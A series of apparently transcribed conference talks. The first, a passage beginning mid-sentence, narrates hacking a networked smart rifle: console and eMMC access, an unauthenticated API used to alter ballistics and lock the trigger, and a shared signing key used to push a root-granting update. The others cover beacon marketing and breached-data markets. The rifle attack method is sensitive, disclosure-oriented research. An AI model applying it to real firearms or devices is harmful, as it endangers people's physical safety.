rifle has decided that now is the right time. Just a bit of a different image showing pretty much the same thing. And here's what it looks like if you sort of pop the scope open, a bunch of PCBs and some buttons up top, which looks like this up close. But this photo is a bit more interesting. So all the PCBs in this photo are double-sided. So that means that there's stuff on either side of every single PCB in here. And so you see sort of two PCBs on either side and then you have this triangle and there's stuff on all sides and the whole thing holds together. So you can't easily just pull it out in addition towards the top of the photo. There's a bunch of tiny, tiny cables that connect that PCB to like the rest of the rifle so you can't just like pull it out and play with it and pop it back in. So we figured we needed to find a way to just connect a computer to this rifle without taking the PCBs out. We really wanted to avoid cutting any cables or doing anything that could break it. Now, if you watch any sort of hardware talk or hardware hacking talk specifically, a lot of people will talk about UART and how that just makes it really easy to just hook up some cables and you plug it into your computer and you have root access. You get a console and you have full access to the system. So that's what we did. And when we saw this screen, we were like, yes, we finally got it. Like it's actually booting. We got the ASCII. This is amazing. But then this happened and to highlight that a bit, console access but with the login. So it was pretty clear that tracking point didn't really want anyone logging on to the rifle in this manner anyways. We did spend some time trying to guess the login which was a waste of time because we didn't really get anywhere with that. We did get to see if the other image shows it. Maybe not. So you can interrupt the boot process and get this additional slight, almost like a debug menu. So you can dump the memory and you can look at the boot parameters and you can change a couple of things in there. So we spent a long time trying to just dump the memory because we figured, well, if we don't have console access, if we can't log in, then maybe we can just dump the memory and we'll just get everything anyways. That's when we learned that the kernels, which is this part when you boot, are on a different chip than the file system that we're after. So we spent a long time and we just dumped four Linux kernels basically. So at this point, we had to summarize with two amazing bullet points. Console access is password protected and the kernels and file systems are in separate chips. So at this point, we're like, I think at this point we had actually submitted to both Blackin and Defcon and we had stated that we have all of these amazing results and we didn't. So we went down to crunch time to really find something to present on stage because otherwise we would go on stage in Vegas and say, here's this thing we didn't get in. Which is sort of summarize point four. It's not always as easy as it looks on YouTube. When everyone talks about like, oh, hey, I got UART and then I got full-on console access and we're like, no, no. It doesn't always work like that. Sometimes it takes a bit longer and you have to be a bit creative to actually find the stuff that you're after. So for round three, so remember how I said you have to be willing to break the device? We sort of got down to like, well, we don't really have anything. The conferences are actually coming up really soon. I know this is like a $13,000 rifle, but we need some stuff. So we ended up pulling out the PCB because we're like, well, if we can't get to the file system by dumping memory and we don't have console access, let's just pull the PCB and let's pull the chip with the file system and just dump it that way. Except it's pretty hard to figure out which chip has the file system. And we spent a long time reading a lot of schematics and trying to figure out which one could possibly be the chip with the file system. And I can tell you, we actually, sorry, we actually pulled the wrong chip first. We ended up pulling the FPGA. So when we put it back on, the rifle never quite worked the same way again. I mean, it still boots and it has Wi-Fi and you can technically fire. It just doesn't work the same way as it used to. So the file system was actually hiding under here. So at this point, we were really wondering how on Earth do you read data off of a chip like that? And thanks to some amazing people that helped us out with the project, we learned that there's something called EMMC. So it's like a sort of USB memory card type thing. On the PCB, on the side, you don't even have to pull the PCB from the rifle. You can do sort of the same concept as with EOR to sort of plug the right cables and you get access. So we're like, okay, so we're seeing all of these like pins. We're like, well, okay, but how do you go from these pins to an actual connection to your computer? Well, it's like a $100 device. Pretty cheap, pretty easy. So all hooked up, it looks sort of like this. And at the end of it, it's like a USB cable that you just plug into your computer and it sort of just pops up. It's like a USB drive. Full access to the system. At this point, we're like, yes, we finally have something. And this was like two months before this massive conference in Vegas. We're like, yes, we finally have stuff. But now came the hard part. We finally got access to the system, but finding any vulnerabilities that we could use as sort of like malicious attackers was still the challenge. It was still something that we had to do. So poking around the file system and sort of figuring out how the system works. What is it that you communicate with when you're using the mobile apps? So we managed to sort of create this admin API. And I haven't listed all the calls that we got access to, but the bottom one says SSH except. So this is sort of a type of API call that if you know about it, you can use it. And this one will open for 22s. You can SSH in. There's a bunch of other calls as well. Sorry. We decided not to list, not to name all of them because the US military does own and use some of these rifles. And tracking point has also stated that any US agency that wants to use their firearms to fight ISIS in Syria will get the firearms for free. So we figured we'd just not list or name some of these API calls just not to piss anyone off. So there's one call that I'll just refer to as the system backend. So it's one call that if you know about it, you can use it, which will just open a port in the firewall on the rifle and you can just use like a standard UNIX socket to connect to it and talk directly to the system backend. So while the API that the mobile app is using validates your input. So like I said, you can't like if you're changing the temperature, you've got like five values that you can change between or choose between. But if you're talking directly to the system backend, you can set whatever you want and it's not going to reject it. So if you want to set at this point that the temperature is minus 50,000, you can and it's going to happily accept that value. So by talking directly to the system backend in this way, you can make temporary changes to the system and you can change things like when temperature ballistics values, you can change the ammo, you can make the scope think that it is attached to a totally different firearm. You can control the solenoid so you can actually lock the trigger. So while we cannot fire remotely, we can prevent anyone from actually pulling the trigger. So here's a, I got a video demo that shows how the rifle works normally. So the sort of top right box there is the video from the scope itself. And what you'll see is you'll see the crosshairs move and then we tag the red circle in the middle and then you'll see us fire. So as the crosshairs, we're just sort of trying to figure out where to drop the tag. That's the tag. And this was 50 yards. I forget how much that is in meters, but it's not. Very, very far. But it has a, it can go a bit further, but this was just for the purposes of the video. So it's pretty easy. Nothing sort of super exciting. Now this one is a bit more interesting. So at this point, we, by communicating directly with the system back end, said that the bullet is heavier than it really is. We went from like a default value of like 125 grains to, I wonder if it was 50,000, some crazy, crazy number that just like, just happily accepted it. So what you see again in the top right, this is the same target that we just fired it. So what you'll see is that we're going to try and again put the crosshairs in the red blob in the middle, tag the same target in the same spot and fire. So the crosshairs jump far to the right because we changed the value. Now what happened is that we hit the target on the left instead. So by just changing one value, the weight of the bullets, we can hit a completely different target. And there is no indication in the HUD here to the user that this is going on. So these are all temporary changes. We wanted something a bit more exciting than that. We wanted to try and make permanent changes to the rifle. I'm sure it leads us to this sort of lesson five, you need to understand the tools you secured the device with. I guess that is more of a lesson for the vendor and not for me, the hacker. But digging around the software update script of the rifle. So I mentioned the packages are all GBG encrypted. And they can only be decrypted with a passphrase. Once we were on the scope, we found the update script and we found the passphrase that we needed to decrypt the packages. So actually pulling like 10 versions or 10 updates worth of packages was really easy and you could decrypt the individual packages as well and then modify them. And the reason you could modify them is that the tracking point has two GBG keys. One which the company holds and is the set of keys that it's using to actually sign and encrypt the updates in the first place. The second key or the second set of keys is on the scope. And every single tracking point firearm has the same GBG key on it. So if you have access to that key, you can create an update that is actually valid on every single tracking point firearm out there. Which will allow us to make persistent, permanent changes to the system and also gives you root access. Because at this point we found that yes, we can make it fire to the left or to the right. We can make it not fire at all. But we still wanted to be able to assuage into the rifle. So I created a custom software update that just added our own user to the system. So this is a video that just shows, it will show us trying to log in as the user hacker. You'll see that failed because that user doesn't exist on the system. Then we'll upload and apply our custom update and then we'll try to assuage again. So initially we're just using the SSH accept call just to open the port. We try to log in. It fails. And this is what you see inside the scope when you're applying the software update. So it added the user to the user table and then it just reboots and just loads the HUD again. We try and SSH one more time. Get the password and get root access. So that just sort of goes to show lesson number six. Again a pretty simple one that a motivated attacker will always find a way in. Granted it took us almost a year on and off but it took us a very long time. It wasn't like these YouTube videos where they're like hooking up UART and they're in 10 minutes later. So it took a long time but it was a really, really fun project. So for the sort of RAM 3 findings, the admin API is unauthenticated. So this means that anyone who can connect to the wireless network and know the right API call to use to communicate with the system back in can do so. There's no additional checks. The only thing that can give away that someone has connected to the rifle is when you're inside the HUD up in the top right corner, there's a little like a Wi-Fi indicator with like a number below it. And so it will say one or two or three depending on how many people are connected. But I can assure you if you're looking inside that scope and you're really focusing on your target, you're not going to see this like tiny number up in the right hand corner change. That and anyone who's got full access to the system in this, we can easily just either disappear that little icon or just change the numbers. System back in is unauthenticated. System back in does not validate input, which is what allowed us to change the bullet grain value. The GPG key on the scope can encrypt and sign updates for any tracking point firearm. So at this point, we knew that if you wanted to make permanent changes to the system and if you wanted root access, you had to use a software update to do so, which is fun. But we wanted to find like an additional way of getting in. So if you want to watch the video, it's on YouTube, but we found a remote code execution as well. So without a software update, you can still get straight up root access on the rifle. And so you would think that after talking about root access and custom software updates and remote code execution on this thing, you would think that it's pretty bad. But I would say that it's actually not all that bad. When you look at this sort of hardware project or IoT device and compare it to other IoT devices, TrackingPoint actually did a pretty good job securing it. So the USB ports are disabled during boots. You can't do anything with that. You can even if you just try and plug in a USB stick, nothing will happen. There's no power going to those ports. The media is deleted from the scope once you download it onto your phone. So this means that if someone else were to connect to your rifle, they're not going to see the shots that you took two months ago if you have already downloaded them. They're deleted from the scope right away. WPA isn't used even if you cannot change the wireless password. The AP does validate user input and I added a little asterisk to it because the API I'm talking about is the one that you're using when you're using the mobile app. So at least a random person with the mobile app can't do any solid damage. You need to know the other API calls to actually do anything fun. Console access is password protected. We had to have like a software update or remote code execution to actually get in and this is something that we didn't get until we had really taken the whole thing apart. Software updates are GPG encrypted in sign, so they tried. They didn't sort of implemented the way they probably should have, but it does mean that random people that aren't willing to invest a year's worth of time researching a project aren't going to go and mess with people's rifles. So they actually did a pretty good job securing the system. But I guess another lesson for the vendor and not for the hacker, companies need a process for handling security issues. And this is very, very true for tracking points. So when we sort of submitted to BlackHide and DefCon, at the same time we contacted tracking point because we just wanted to say like, hey, we're working on this project. We're presenting or we're hoping to present in Vegas. We haven't really found anything sort of major yet, but we just like want to open the lines of communication and just sort of stay in touch. And we got zero replies until Andy Greenberg was writing this Wired article about our project and he reached out to tracking point a week before our presentation last August. And only at that point did tracking point get in touch with us to hear what we had found and how they should fix it. So we went through all the different issues with them and told them exactly what they need to do to actually just lock this thing down even more. They stated that they will mail a USB with a patch to all their customers that never happened. The only thing that did happen was tracking point updated its website with a message that says you can continue to use the Wi-Fi on the rifle if you're confident there are no hackers within 100 feet. So this is like the official comment from tracking point when someone hacks their rifles. Later on, so they're still in business and later on one of the fanners I think was quoted in the media as saying that well no one is going to hack the rifle of a red-blooded American. And I'm thinking well we did and you should fix it but they still haven't. So the issues are still there. Lesson eight. Hacking a rifle sounds pretty fancy but IOT attack vectors are pretty much the same across the board. If you look at presentations where people talk about hacking cars or hacking any other sort of type of device it's going to come down to the same approach for the most part. The same issues pop up again and again and again. So this wasn't sort of black magic. It wasn't stuff that you guys couldn't do either. It took just a very long time. But the way that we got in finally is sort of a very sort of standard approach I would say. So we added like a slide to kind of like give the vendors something instead of just sort of standing on stage and saying hey we hacked your rifle and you should fix it. We wanted to sort of add that the issues that we found are not unique to the rifle at all. Too many vendors ignore the low hanging fruit. Especially if you look at the two bottom resources there. Build it securely in the OWASP IOT top ten. It's like two fantastic resources to just find really, really common issues in IOT devices. Whether it's default passwords, console access with no password, SSH, root access, all of these different things, there's just a lot of standard bits and pieces there. And sort of leads me to this sort of other point that innovation is the main focus in IOT sadly. If you look at any sort of kickstarter page or look at any sort of IOT device out there, people don't want the super secure box that does some stuff. People want the super awesome box and then they don't really care if it's secure or not. Security always sort of comes not even second. It's not something that people usually question. And I wouldn't say it's not because people, it's not that people don't care. They just don't understand that security is something that they should question and something that they should want. It's just always the case that, and especially in Scandinavia, I would say that people just assume that it's there because why would you create a device that is insecure? You just can't. It doesn't work like that, right? So innovation is sort of like the sort of driving force in this space. And finally, I do want to add that for anyone who's considering working on like a hardware project, final, final lesson for us was don't be afraid to ask for help. If we didn't ask for help and didn't get help from a bunch of really, really awesome people, many of them are former Intel people, actually. We would never have gotten the presentation that we really wanted to give. We would never have found as many of the issues as we found. If you are working on any sort of hardware hacking project, there's a bunch of people that are interested in it that are in this space and that are really happy to help out as well. There's a Norwegian named Maria Mu. She gave a presentation in Germany in December last year by hacking her pacemaker. Some of you might have seen that presentation, but she did the same thing. She had this project in mind, but she also reached out to people in the community for help with it, which just made her presentation a lot more awesome. So there are a lot of really awesome people in this space and they're happy to help. So with that, I want to thank you all for coming. If you have any questions, I'm happy to take them now or I'll be around later as well. Thank you. Thank you.
The TrackingPoint precision-guided firearm can follow targets, calculate ballistics and drastically increase its user's first shot accuracy. I spent a year hacking it. I showed how an attacker can modify values on the scope, force the shooter to miss the shot, and permanently alter the way the firearm behaves. In this talk, I will discuss 10 things I learned from this project.
10.5446/50526 (DOI)
Hi, everyone. My name is Ulrik. I'm one of the co-founders of Fluxloop. We started off four years ago and went from being a traditional IT consultant to wanting to focus on creating unique user experiences within a physical context. So we quickly found that beacons would be useful for doing that. And we created the service called Pinch. The reason for why it's called Pinch is we want to get some attention from the persons that we know where are. Because Fluxloop is all about proximity and knowing the knowledge about knowing where people are. So we got four main areas of focus at the moment. I'm going to give you a brief introduction to what the service is. And then I'm going to show you where we have used it in Scandinavia. So it's mostly going to be actual cases. And I'm going to do some demonstrations as well. But first, we created a proximity SDK that we can put into existing mobile applications. So we can communicate and understand where beacons are. And we're trying to get that SDK, of course, into as many applications as possible. Because we're also sharing anonymous data. I'm not going to talk a lot about that part and the security part and the privacy part of this whole complex proximity business. But that's definitely parts that we are quite interested in and working a lot on. Then we're also building a beacon network of fixed installations within transportation, in shopping malls, in cinemas, and all kinds of areas. Because we're also building this network. And when you have a volume on both applications with our SDK, as well as the beacon network, you gather a lot of data. The data you can use for all kinds of stuff, which the previous presenter mentioned, are you combining the IoT sensors and senders with data? You can create quite unique user experiences. So we're using a lot of this data to help making better communication and also often marketing. I'm going to show you a bit about that in a second. So when I was invited here to talk about our services and what we're doing, I was a bit unsure whether or not to do this slide or not. Because I guess people going to IoT conference would probably know how beacons work, for example. But it's interesting because people who say they know how this work often tend not to. So I'm going to do it anyways. And it might be boring for some of you, but I'm going to do it anyways. So you got a beacon, and it uses Bluetooth to communicate some IDs. In this case, we just call it ID number nine. And then you got the mobile phone, which has Bluetooth enabled. And it's actually operating system on the mobile phone that's looking for beacons at all times. So iOS or Android will recognize ID number nine. And it will check whether or not there are applications that are subscribing to ID number nine. And if there are, we can open or do some actions based on that. For example, in this case, we got the H&M application that will be triggered and do something when it's nearby ID number nine. So as I mentioned, Bluetooth is, of course, important. It has to be enabled. And do you know, well, how many people here do have Bluetooth enabled at all times? Yeah, it's an IoT conference, right? We do a survey each year to figure out how many people actually are using Bluetooth and have it enabled at all times. In 2014, we saw that 27% are having it on at all times. Last year, we saw it was 31%. But since we do have our database with a lot of users, we also see that within that user base, there's 43% actually having Bluetooth all at all times. And it's quite a, most of those are actually Android users. I don't know why, but that's what we see. Also interesting to see is that almost 70% of those that chose not to have Bluetooth enabled has had it enabled within the 30 last days, within the last month. So people are turning it off and turning it on. So I'm going to jump directly into a very traditional beacon scenario and something we delivered for Netcom now, they're named Telia, last spring. We installed beacons at their shops around here in Oslo. And when users with the Netcom application went past their shops, they got a message, a push notification, you clicked on it, and you could get this coupon. They gave away battery packs. And the test was basically to figure out whether or not we're able to get people into the shop. That's what it's all about for the shops. And 50% of those who got that message also went into the shop and used the coupon, the voucher. And you could say, well, of course they did because it was free. They got a free battery pack. Well, I agree. Although we also see that as a telco, they know a lot about the users. So they would be able to communicate relevant messages for a specific user. I should get a different message since I have an Android phone and another guy should have a specific message based on their iPhone. So it's all about the relevance and the message that you send. And we see that in other countries, we are able to, we see that the results are between 40 and 60% on these kinds of campaigns as long as they're relevant. Another fact is that we saw that people got this message in the morning when they were going towards to work. They did not go into the shop at that time, but they went to work. And when they went home after work, they went into the shop. That's useful information for Netcom. We also saw that there were a lot of people not being Netcom customers, but they had the application. And they went into the shop and wanted to get a free battery pack. And Netcom gave them free battery packs, but they also managed to turn and turn as they go, turn a lot of the users to become Netcom customers. And that's a good story for telcos. Two weeks back, we worked with BueleM, a festival, a lot of concerts here in Oslo. And we worked together with Norsk Tipping. They wanted to do their concept where they call people and say that they have won money. It's a nice concept. So within the application of BueleM, you registered your phone number. And if you were at the festival near the concert arena, they turned down the music and called people that were actually in the concert area. So then we used the knowledge about knowing where people are. They have opted in and wanted to be participating in the lottery. And Norsk Tipping were there and called actual users. That was quite fun. Another case we've done for another telco, Telnur. At the national soccer arena, Ulleval, we installed beacons at all entrances and at all around where people are seating. And when a teleno user with the teleno application went to the arena, we sent a push notification and a coupon as this, where you got a free coffee and a free, I don't know the English term for it, actually, this piece that you can sit on. And you can just get that in the shops in Kyosks. So this is quite an interesting case because we installed beacons all around Ulleval the week before and there's no people there. It's quite different from, well, on a beacon you're setting this frequency on how often you send the ID. And you also specify the strength of the signal. And when Ulleval is empty, well, you set the frequency at some level and the strength at some level. But when there are 28,000 people there, the radio signal is absorbed by the different bodies. So we were not able to reach as many as we wanted for the first time. We did it during two matches. One was Norge Ungarn and the other one was the Cup Final the week after. So the first time we were not able to reach as many as we wanted. We didn't manage to give away enough coffee. But the week after during the Cup Final, we managed to give away a lot of coffee and the Kyosks went out of coffee actually. So that was a big success the second week. So this is, even though it says H&M, we don't have them as a customer yet. But this is a relevant scenario. And I'm going to explain how we are working together with Clare Channel and their digital auto home screens. The scenario here is that I'm typically home in using H&M's mobile application. And it, in this case, I pinch. I found out those trousers. I like them and I'm going to put them into the basket. The problem, a big problem for mobile retail is that a lot of people are not actually fulfilling or doing the whole purchase within the mobile channel. Many are using the basket just for storing their favourites. So when I'm the next day, I'm going to switch to a demo here. Go to, for example, Sturo shopping mall here in Oslo. And you go past, go past Clare Channel digital advertisement screen. This is typical. I've been disconnected from internet during my presentation. Just give me a second. All right. There we are. So, this illustrates two Clare Channel screens at the Sturo shopping. And you know that I looked at those trousers yesterday. I thought they were quite nice. And when I go past one of those screens the next day, I will typically become retargeted by the screens. And you will see that the H&M advertisement will occur after the, at least, just give it a second. Hopefully I'm still online. If not, that's a problem. I'm not. Okay. Sorry about that. Looks like I'm not connected to internet. And that's a huge problem, as we all know. Just a second here. Where are we? There we are. No, it doesn't seem to work. It's coming up. It's coming up. So, there's my, thank you. We're going to come back to that test. Okay. I can talk more about another customer of ours, which is the amusement park, the amusement park in that Christian's son. Last year we rolled out beacons all over the amusement park. They wanted to know where people are, where they are moving, and what's the dwell time at different areas. They did not want to do as netcom or tell them no, they did not want to push out commercial advertisements. You see here that there's a lot of beacons zones. And down at the left, every day, the lines are being fed. So, that's a very, very popular show to look at. But people who are going to the park, they tend not to have a very precise plan for what they're going to do. So, what's important for the park is to make people go to the lines show. So, what we did through the park was to give that kind of information as this. We didn't send it to those that were immediately nearby number 17. We sent it to those in other areas, typically 15 minutes before the show started. So, were you in area 37 or area number 2 or number 8, you would get that message. And we see that that was relevant because we saw that people were actually moving from those areas to the lines and actually saw the show. And the Deer Park knows that people love that show and what did Park would say, they would create happy, happy customers. And when they have been to those shows, we also saw that we could send them a question, please give that show a rating. Do you enjoy it? Did you enjoy it? Deer Park, they had 20,000 visitors a day during July, half June, half August. We reached 6% of those and we sent approximately 5 messages to each and every user during this day. And then the typical discussion, how much is too much messages, etc. Well, one person clicked on the link down at the right here, which says, don't send me more messages. So, the messages here are very relevant and we don't know where the threshold is. But people, they were rating and giving a lot of feedback in general, so it was 30% actually responding to this. That gives Deer Park a lot of knowledge about how people are enjoying their amusement park. That's important. As a result, Deer Park will end their traditional survey as they've been doing for 25 years and moving over to this kind of service. And the plan was now to show you another demo as well, depending on whether or not I'm online. So let's see if not, I will just continue. Thanks. The technology is not too kind to me. Because when we got this information, it's interesting to see how we can visualize it and show it to our customers. And we can use, for Deer Park, we did that with, like this. And here you'll see people moving around. This is actually not the Deer Park, it's a conference that we have put beacons on as well. But here you see, the dots here are people moving from one area to another at a conference. And you see the day and you see the time as well. They're obviously eating at eight o'clock. But there were meetings around six o'clock and you see people going outdoors into mingling zones, etc. We're doing this for Deer Park as well. And a different series, and what's interesting is that we see that people use the whole of Deer Park. So it's fairly even set of people moving around. But in a conference context, that would be totally different as we see here. People are moving as sheep, right? And we did this for a conference at Norifjell Hotel. And we also made a service on top of that. This was also for Tel-Nor. So we looked at the people participating within the conference. We saw the data we had about them and where they were moving around. And then we did some analysis on top of that, figuring out who should meet. So we call it Tinder for events and conferences. And that was quite popular. We saw that people were actually meeting up. It was quite easy to make them do that because they were only Tel-Nor employees. But still, the feedback was quite nice. So in this case, Knut Ivar got a message that, hey, you should meet Frude. This is his picture. This is his interest, such as skiing, biking, family, and friends. And that's information that we gather both from his whereabouts at the conference as well as what he has given us before he entered the conference. This is something we're looking into doing in different contexts as well. But the conference is a very isolated and good place to do that. And we put up screens showing who were in which areas. And we saw that actually people were looking at those screens. Okay, everyone else is now in the restaurant. I should move there as well. So people are, these people are actually using the infographics to understand where everyone else is and moving there as well. As you understand, we're working a lot with Tel-Nor. And the last thing we're doing with them at the moment is helping Tel-Nor communicate with their employees through their application. So we have installed beacons at all offices around Norway, even in Svalbard. So it's probably the beacon longest north in the world. And they are willing to communicate with their employees. For example, when they're in the social area, grabbing a coffee at lunch, etc. And they're going to communicate the new strategy that they are just rolling out, which is a strategy until 2020. And there's a lot of interesting aspects with this case. There were mentioned privacy earlier today. It's even more strict when there's an employee context. So we've been working a lot with that. And we also created a privacy dashboard where you can specify explicitly what kind of data you want to share with your employee in this context. So an example of that would be that if you enter an elevator at Fornebud, the headquarter of Tel-Nor, and you're a Tel-Nor employee, you would get an elevator pitched by the CEO from Tel-Nor on your mobile phone. That was the cases I was going to show you. I'm sorry about the demo is not working. You can come up here afterwards and I can show them to you hopefully. And thank you. Any questions? No. Thank you.
Ulrik will show and tell you about actual deployments of proximity services from real cases in Scandinavia. From traditional retail beacon solutions to more advanced proximity triggered communication through different digital channels covering consumers as well as business internal communication. Did you know that content on digital ad screens are being shown based on your online and offline behaviour?
10.5446/50531 (DOI)
I'm going to start my presentation without the screen because otherwise we might be waiting here for quite a while. So let us have a look at this. So what I want to talk about today is I run this service called Have I Been Poned. Does anyone use Have I Been Poned? Who's using it? Keep your hand up if you're in the data breaches. All right. Just the security guy. Oh, one other guy. What do you guys in? Which ones? Adobe. Adobe. Who's in Ashley Madison? That's exactly what you say when your significant other says, were you in Ashley Madison darling? No. Ashley what? So I was in, I was in Adobe originally. I was in Patreon. So Patreon for crowdfunding for fledgling artists. I was supporting a guy who does a podcast about security where he talks about data breaches and he asked me to sign up to Patreon in order to give him like $5 a month. And then Patreon got hacked, which he got to talk about on the show because it all kind of went round and round. So I was in that, I was in a triple O web host as well. So they had 13 million accounts which were leaked in about November. 13 million accounts or with plain text passwords as well, which wasn't, wasn't a real good look. But what's really interesting is a few months ago I realized as I was sort of going through and getting these data breaches and loading them into the system is that I was seeing some really, really interesting things. So really interesting discussions with everything from the organizations getting breached to the people trading the data to the hackers actually hacking into the system and even to authorities. Oh, we're getting somewhere. So while it warms up, even having some interesting discussions with the likes of the FBI. And I thought, let's make a really good talk because there's a lot of stuff that happens behind the scenes, which people don't normally get to see. And now I can actually show you what those discussions look like, which is good. Now if you are interested in doing the Slido thing, that's what you need. So Slido.com, I think there's an app and you need that number 1853. And if you use that, then you can ask questions that are related specifically to this event, which will work well. So now getting into the original intention of the talk. This is what I called it. And this was some months ago and I thought, wow, 220 million. Like this is a lot. I'll do a talk and I'll call it what I learned from 220 million breached records. And then while I was preparing the talk, I had to change the name of it because everything changed again. And suddenly it wasn't 220 million, it was 235 million. So, okay, I changed the name of the talk. And then a little bit more time went by and I had to change the name of the talk again. And it was getting so many, I went, I can't put an exact number on it. We'll just say a quarter of a billion. And I think now it's actually 269 million. I did this talk in London last week as well. And since then, there's about another 10 million results in there. So every time I go to do this talk, the thing changes. But I think that's sort of kind of the point as well, right? Everything is moving ahead really quickly. So this is a system I mentioned, have I been pwned? That's out of date. There's two more data breaches now with about another 10 million odd records in there. And if you haven't seen it before, it's very simple. Data gets hacked, it gets published publicly, usually by the hackers. I download it from publicly available locations and I make it searchable. So you can go through and say, where has my account been exposed? Which is kind of neat because then you see all the different places your information gets leaked. If it's a really sensitive data breach like Ashley Madison or adult friend finder, then I make sure that you only get to find out if you're in there if you can receive an email confirmation. So you can't go and search for your significant other, your co-workers, your boss. Although there are other companies that encourage you to do that and that's one of the things I'm going to show you today. So one of the things that's interesting when we talk about data breaches is the perception of hackers. And we get a lot of feedback via the media about what hackers are like. It's kind of curious, you can learn a lot from Google. If you go to Google images and you search for hacker. Now this is curious because there's a trend here, right? So hackers, and you see this on like every single newspaper, every single website that talks about hackers. What we know of hackers is they have hoodies, they have Guy Fawkes masks, they work a lot in binary as well. Curious fact. There's also a lot of green. And then some news stories, they sort of put all those things together and they go, this is a hacker. It's a Guy Fawkes mask with a hoodie with binary. And this is like sort of the ultimate personification of what the hacker is. Now we also see a lot of stuff about hackers in promotional material. So a lot of companies making a lot of money out of the fact we get hacked and they want to make a lot of, I guess they want to make people kind of scared. So they do stuff like this. This is a Kickstarter for a little application, a little device actually called Kujo. And here's what they do in their adverts. You may not know it, but you've probably already been hacked. Thousands of hacking attacks occur each day. Sounds scary, doesn't it? Listen to the music. You may not know it. You've already been hacked. And he's got a hoodie because he's a hacker. But here's the interesting thing, right? Like have a look at what he's typing into. This is a zoomed in bit. This is not a terminal. This is a browser. He's hacking in the browser. And I want to show you how you can impress your friends and colleagues about how you hack in the browser. What you do is you go over to hacketyper.net. Okay? And what you also got to do is press F11 to put it in full screen because then it looks pretty serious. And then this is how you hack. This is real. You got a hacker type and you just hit keys. And it does this. I zoomed in on the code block and it is from hacketyper. They are selling their device on the premise that a hacker is you can hacketyper to hack. Anyway, there are all sorts of websites that do exactly this and all sorts of news articles and things that basically prey on the fear of people by using resources such as hacketyper basically just to scare people, which is kind of sucky. Now this is the reality of it, right? So this is the reality of who the hackers are. This is Jake Davis. He was 19 in that photo. He was part of Lullsec in 2011 going around hacking lots of things. Look at his mum. How do you think his mum feels? They're in court, right? It's like a death stare. He's so grounded. He's really grounded. But he did a lot of damage. He's a 19 year old kid. Another kid, same sort of deal. Also in court, also with his mum. His mum doesn't look real happy either. But this is what happens, right? It's these kids going around breaking into things and clearly making their mothers very, very upset. And the interesting thing about this is this is what hackers are normally like. This is anonymous, right? This is kind of the sophistication level of the people that are breaking into these systems. And we kind of lose track of this a little bit. And then we see the media and we see the scary hoodies and things. And including when we see the bravado, the two kids in the previous shots were very much talking about how powerful they were, how unbeatable they were, how they could break into anything. You know, very, very bravado sort of behaviour. And clearly it didn't work out real well for them. Now this was a really good example. Did everyone see Talk Talk in the news just a little while ago? So Talk Talk is an English telecommunications company and Talk Talk had a major security incident. So they had a whole bunch of data sucked out. It was in the news. It was in the news a lot in Australia. So it must have been really, really big in the UK. And after the attack, this detective came out and he said, okay, here's what it was. It was Russian Islamic cyber jihadis. That's terrifying. It's like every single buzzword. Is anyone here Russian? Right, good. So I get the impression that Russians are scary. Like they sound scary. So we got that. Obviously in Islamic cyber jihad, he also sounds very scary as well. So this was the news, you know, trying to get everyone scared about these Russian Islamic cyber jihadis out there. Now here's what it really was. 15 year old boy in his bedroom, because where else is he going to be, right? If he's hacking away on computers. So there was him. There was also 16 year old boy, a little bit older. And then there was this really, really old guy. He was like 20. This is the senior citizen of the hacking circles. And the thing about it is that all these guys are the ones that broke into these systems. It wasn't the scary Russian Islamic cyber jihadis. It was just bored kids. And very frequently when I get data from people and get communications from people, I realize that it is just bored kids. And they often turn into scared kids too. I'm going to give you an example of that. Now monetization is a really interesting one because people want to make money out of data breaches. You can go to online marketplaces and buy data. You can buy credit cards. You can buy social security numbers for people in the US. You can buy dates of birth. You can buy all of these different attributes online. Elections are about a dollar each. You can find these sites sometimes on the ClearWeb, very often on tour. You open up the tour browser, you plug in a URL. There's a marketplace. The marketplace has sellers. The sellers have ratings. There are transactions. There's feedback. It's just a normal marketplace. It is like eBay, but for data breaches, drugs, guns, all this sort of thing. So all this sort of data has a value. Now it's interesting when I see things like this. So I get messages from people saying, I've got something I'd like to sell to you. So in this case, the guy wanted to sell Nexus mods. It was a forum. I would like a sum of Bitcoin. They're coming to me thinking I'm going to pay them money. And of course I never do. I go, okay, I'm not going to be part of your illegal activity and then document the whole thing on Twitter as well because sooner or later your account's going to be seized after you get caught if you're the one going around doing this sort of stuff. Now curiously, since I created this deck just last week, someone did actually give me Nexus mods. They said, here you go. We've been trading this in the underground forums. You might find it useful for your site. So eventually this sort of stuff turns up anyway. Now there's another good example. IPM offers a personal management. This was a big breach in the US. Have a look at how much they reckon it's worth. More than 100 Bitcoin. Bitcoin now at the moment is about 300 US dollars. So maybe $30,000. I don't know, like it's one guy on Twitter, but I've got other examples of the prices these things are being sold of. And when you think about it, the sort of data that was leaked about government personnel, pretty sensitive info. It's definitely got a price, probably a high price. So this sort of thing comes up quite a bit. This was after the triple O web host. So triple O web host got breached. It actually got traded quite significantly last year. It looks like it got breached in about March and eventually I got the data via a journalist later on in the year. And I put a question on Twitter, very vague question. Anyone have an account on triple O web host? And this guy got in contact with me via direct message. And this I found really interesting because he says the database is private and it's better kept that way. Now what he means by private is that someone had hacked into it and they were trading and selling it between themselves. That's what private was. They didn't want it to be traded and sold or publicized by anyone else. They wanted to keep it quiet. And they want to keep these data breaches quiet because whilst they're quiet and the victims don't know about it, the victims can be exploited. Once the victims know that triple O web host is hacked and the password they use there has been exposed and remember it's plain text stored in plain text. So no cryptography whatsoever. Same password they use on other accounts. Once the victims know the value goes down. He also said this, selling for upwards of $2,000 right now. I can't understand which moron would be considering just giving you a copy. Maybe a moron with a conscience could have been that. Because this is the thing like basically what he's saying is we are going around exploiting the people that were compromised in this data breach. What moron would want to stop that from happening? Like this is the level of sort of ethics and morality of a lot of the people that are dealing with this data. Now triple O web host was also for sale on other sites. This is a site that sells that sort of data. You can see it sells a few different things here. Triple O web host was selling for $1,500 at the time that this particular incident broke. In fact, just before it went public. Another guy said $2,000 triple O web host here $1,500. After I made it public and there was also a long lead into this where I was trying to get in touch with the company. They wouldn't respond and eventually we made it all public. After it went public it went from $1,500 down to $200. Because suddenly the value goes right down. So whilst it's private and the victims don't know about it, they can exploit the victims. Once it's public and the victims know it goes down. Then it went down even further. So it's now wiped off 90% of the value, which I'm kind of happy about. We have screwed the market for this data breach, which is good. We don't want it being monetized in that way. Here's another good example of monetization. So this goes back to Ashley Madison again. And when the Ashley Madison breach happens, so we go back to July. And in July hackers come out and they say we have broken to Ashley Madison. We have all the data either shut the site down or we're going to dump it all publicly. And of course they never shut it down. They were never going to shut it down. So it did go public. It went public in August. And after it went public, a bunch of companies started monetizing the data. 